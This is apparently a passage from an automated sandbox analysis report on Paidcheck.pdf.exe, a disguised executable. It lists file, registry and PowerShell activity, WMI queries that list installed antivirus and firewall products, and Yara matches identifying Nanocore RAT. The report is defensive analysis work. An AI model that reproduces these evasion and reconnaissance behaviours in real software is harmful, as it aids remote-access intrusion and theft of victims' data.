      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC02F0 GetSystemTimes,
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

      Stealing of Sensitive Information:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
